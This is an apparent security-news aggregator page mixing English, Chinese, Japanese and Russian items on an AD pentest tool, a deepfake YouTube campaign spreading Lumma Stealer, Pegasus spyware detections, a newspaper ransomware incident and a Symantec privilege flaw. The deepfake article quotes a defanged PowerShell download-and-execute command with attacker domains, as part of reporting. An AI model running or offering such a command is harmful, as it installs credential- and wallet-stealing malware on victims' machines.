Aggregator

Идеальная подделка собьёт с толку даже самого опытного пользователя.

RedTeamPentesting has unveiled a new tool, keycred, which offers a robust solution for managing KeyCredentialLinks in Active Directory (AD) environments. This command-line interface (CLI) tool and library implements the KeyCredentialLink structures as defined in section 2.2.20 of the Microsoft Active Directory Technical Specification (MS-ADTS). It also allows for practical deviations from the specification, making it […]

The post New Active Directory Pentesting Tool For KeyCredentialLink Management appeared first on Cyber Security News.

HackerNews 编译，转载请注明出处： 新一波的 “自骗” 攻击浪潮正在利用 AI 生成的深度伪造视频和恶意脚本，目标锁定加密货币爱好者和金融交易者，标志着社会工程战术的危险演变。 据网络安全研究公司 Gen Digital 发现，这场活动利用经过验证的 YouTube 频道、合成人物和 AI 制作的有效载荷，操纵受害者主动破坏自己的系统。 这种攻击在 2024 年第三季度激增了 614%，结合了尖端的深度伪造技术和精心设计的心理诱饵，引发了对生成式 AI 在网络犯罪中武器化的紧迫担忧。 安全分析师指出，该操作始于一个托管在拥有 11 万订阅者的被攻陷 YouTube 频道上的深度伪造视频。 视频中出现了一个名为 “托马斯・哈里斯” 或 “托马斯・罗伯茨” 的合成人物，利用先进的面部动画、语音合成和身体动作复制技术制作而成。 尽管该频道看起来合法，包括从 TradingView 重新发布的内 容，但未列出的教程视频指导观众激活一个虚构的 “AI 驱动的开发者模式”，声称该模式可以以 97% 的准确率预测加密货币市场趋势。 攻击的核心在于使用 AI 生成的脚本设计来规避怀疑。观众被引导打开 Windows 的运行对话框（Win+R）并执行一个从 paste-sharing 网站（如 Pastefy[.]com 或 Obin[.]net）获取恶意脚本的 PowerShell 命令。 研究人员解密的一个代表性有效载荷显示攻击者使用 ChatGPT 来优化他们的代码： iex (New-Object Net.WebClient).DownloadString(‘hxxps://pastefy[.]com/raw/AbCdE123’) 该脚本连接到一个命令与控制（C&C）服务器——最近被追踪为 developer-update[.]dev 或 developerbeta[.]dev——以部署 Lumma Stealer 或 NetSupport 远程访问工具。 前者窃取加密货币钱包和浏览器凭据，而后者则授予对系统的完全控制。取证分析揭示了关键组件的 SHA-256 哈希值，包括： a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797（恶意 PowerShell 脚本） 2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e（Lumma Stealer 变种） 至关重要的是，深度伪造视频通过程序细节隐藏了其人工性质——一个合成声音解释了如何通过添加注册表排除项来绕过 Windows Defender，而屏幕上的按键操作则模仿了真实的 TradingView 工作流程。 攻击者还通过 YouTube 的赞助广告系统进一步扩大了攻击范围，针对观看合法金融内容的用户。 与传统的网络钓鱼不同，受害者主动参与了他们的系统被破坏的过程，认为他们正在访问独家工具。随着网络犯罪分子现在正在自动化人物创建和脚本优化，通过多个渠道验证数字指令已成为一种不可或缺的安全实践。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 移动设备安全公司 iVerify 的新发现表明，强大的零点击间谍软件的使用范围比之前理解的更为广泛，不仅影响民间社会成员，还波及企业高管。 iVerify 在周三宣布，仅在 12 月份，就在其测试的 18,000 台唯一设备中检测到了 11 台感染了 “飞马” 间谍软件。 iVerify 此前在 12 月份表示，自 5 月份首次提供诊断扫描服务以来，在提交测试的 3,000 部手机中发现了 7 部感染了 “飞马” 间谍软件。关于这些检测的新闻报道导致 iVerify 的威胁狩猎应用程序的使用范围更广，涵盖了更主流的用户群体。 该公司描述的最新受害者均在私营行业工作，包括房地产、物流和金融领域，只有一位是欧洲政府官员。愿意透露其所在地的受害者来自瑞士、波兰、巴林、西班牙、捷克共和国和亚美尼亚。 “飞马” 间谍软件由以色列公司 NSO Group 制造，多年来一直面临质疑，因为尽管该公司声称其产品仅出售给针对犯罪分子和恐怖分子的政府，但该间谍软件仍频繁出现在民间社会的手机中。零点击间谍软件无需与设备所有者直接交互即可安装。 iVerify 应用程序下载费用为 1 美元，用户可以每月扫描一次手机，检测高级商业间谍软件。设备所有者只需按照几个简单的步骤创建一个诊断文件，iVerify 将在几小时内完成评估。 该公司的扫描通过查找恶意软件签名并部分依赖机器学习来发现间谍软件感染的迹象和设备中的异常情况。 据 iVerify 称，新确认的检测发现了 2021-2023 年间的已知 “飞马” 变种，许多受害者被多种变种攻击。iVerify 表示，有些受害者被监视了数年。 iVerify 表示，仍在研究多个额外案例，这些案例中的法医痕迹表明可能存在潜在攻击。 企业高管成为 “飞马” 间谍软件的目标，为这场间谍软件危机增添了新的维度。这些高管可以接触到秘密的公司计划、财务数据，并且经常与其他在幕后进行敏感工作的有影响力的私营部门领导人交流，包括那些可能影响金融市场的交易。 迄今为止，大多数已知的 “飞马” 感染案例涉及记者、人权活动家、政治家和其他民间社会成员。 “从安全角度来看，世界对这种情况完全没有准备，” iVerify 联合创始人、前国家安全局分析师 Rocky Cole 在采访中表示。“这种情况比人们想象的要普遍得多。” Cole 表示，在最近的扫描中，只有一半被发现感染了 “飞马” 间谍软件的手机用户收到了苹果公司的威胁通知。 Cole 表示，公司只报告了 “真正阳性” 的 “飞马” 检测结果，并未包括那些无法通过独立外展验证身份的用户。 iVerify 还测试了其他类型的间谍软件，包括 Paragon（Graphite）、QuaDream（Reign）和 Intellexa（Predator）的产品，但这项新研究仅包括感染了 “飞马” 间谍软件的手机检测结果。   消息来源：The Record；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

ABBが提供する複数の製品には、複数の脆弱性が存在します。

Rapid Response Monitoringが提供するMy Security Account Appには、ユーザー識別情報操作による権限チェック回避の脆弱性が存在します。

Elsetaが提供するVinci Protocol Analyzerには、OSコマンドインジェクションの脆弱性が存在します。

Medixantが提供するRadiAnt DICOM Viewerには、不適切な証明書検証の脆弱性が存在します。

Как платформа для бизнеса превратилась в инструмент для кибератак?

个人精力总是有限的，你与你的补集肯定不是对等的

HackerNews 编译，转载请注明出处： 美国媒体公司Lee企业（Lee Enterprises）公布了最近一次网络攻击的更多细节，透露攻击者加密并窃取了文件。 Lee企业在 25 个州拥有 350 家周报和专业出版物。据新闻自由追踪器报道，至少有 75 家报纸受到了网络攻击的影响。 Lee企业首次向美国证券交易委员会（SEC）报告网络攻击时，表示由于 “网络安全事件”，公司在 2 月 3 日遭遇了技术故障。其许多出版物的运营受到了影响，包括印刷报纸、订阅账户和内部服务。 在周二向 SEC 提交的更新中，Lee企业没有明确表示遭受了勒索软件攻击，但根据目前的调查，威胁行为者侵入了其网络，加密了关键应用程序并窃取了某些文件，这符合典型的勒索软件攻击特征。 Lee企业正在进行法医分析，以确定是否有个人或敏感信息因黑客攻击而泄露。 “此次事件影响了公司的运营，包括产品分发、账单、收款和供应商付款。我们产品组合中的印刷出版物分发出现了延迟，在线运营也部分受限，” Lee企业向 SEC 表示。 该公司补充说：“截至 2025 年 2 月 12 日，所有核心产品已恢复正常分发节奏，但周报和附属产品尚未恢复。这些产品占公司总运营收入的 5%。公司预计将在未来几周内逐步恢复这些业务。” 这家媒体巨头预计此次事件将产生重大影响，但财务影响的全部范围尚未确定。 SecurityWeek 尚未发现任何已知的勒索软件组织声称对此次攻击负责。 目前尚不清楚Lee企业是否支付了赎金或正在考虑这一选项，但公司指出，它确实拥有一份 “全面的网络安全保险政策，涵盖与事件响应、法医调查、业务中断和监管罚款相关的费用，但需遵守保单限额和免赔额”。   消息来源：Security Week；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 赛门铁克（Symantec），博通（Broadcom）的一个部门，已解决了其诊断工具（SymDiag）中的一个关键安全漏洞（CVE-2025-0893），该漏洞可能允许攻击者在受影响的系统上提升权限。 该漏洞影响 SymDiag 3.0.79 之前的版本，由于其可能通过本地利用威胁机密性、完整性和可用性，因此获得了 CVSSv3 7.8（高严重性）的评分。 该漏洞源于 SymDiag 的权限管理不当，这是一个用于排查赛门铁克产品（如 Web 安全服务（WSS）代理）问题的工具。 具有低权限访问的攻击者可以利用此漏洞以提升的权限执行任意代码，从而有效绕过安全控制。 该问题特别影响 SymDiag 与 WSS 代理交互的系统，WSS 代理是赛门铁克安全 Web 网关（SWG）解决方案的一个组件，用于流量重定向和云安全强制执行。 根据博通的咨询，该漏洞存在于 SymDiag 在收集诊断数据期间处理进程提升的方式中。 成功的利用可能使未经授权访问敏感系统资源、修改安全配置或中断终端保护服务。 尽管尚未记录任何公开利用，但 SymDiag 的诊断功能与 WSS 代理的网络级权限相结合，如果未修补，将创建高风险场景。 缓解和补丁部署 赛门铁克已在 SymDiag 3.0.79 中解决了此问题，该版本已通过赛门铁克终端保护管理器（SEPM）自动部署到所有受影响的终端。 更新移除了旧的易受攻击版本的 SymDiag，确保使用托管部署的企业客户无需手动干预。 对于独立安装，建议用户通过工具的界面或命令行实用程序验证其 SymDiag 版本。 虽然补丁缓解了 immediate risk，但博通强调了更广泛的安全强化措施： 最小权限原则：限制管理访问仅限授权人员，并对终端管理工具实施基于角色的访问控制（RBAC）。 网络分段：隔离管理接口并限制远程访问仅限受信任的 IP 范围。 深度防御：部署入侵检测系统（IDS）和终端检测与响应（EDR）工具，以监控异常活动，特别是在使用旧版 WSS 代理配置的环境中。 CVE-2025-0893 对使用 SymDiag 与赛门铁克 WSS 代理结合的组织构成了针对性但严重的风险。 迅速的补丁部署展示了博通对其零信任路线图的承诺，尽管管理员应审计旧系统以查找潜在的残留漏洞。 随着云安全工具越来越多地处理解密流量和特权操作，供应商必须在诊断功能与严格的访问控制之间取得平衡，以防止在违规情况下发生横向移动。   消息来源：Cybersecurity News； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文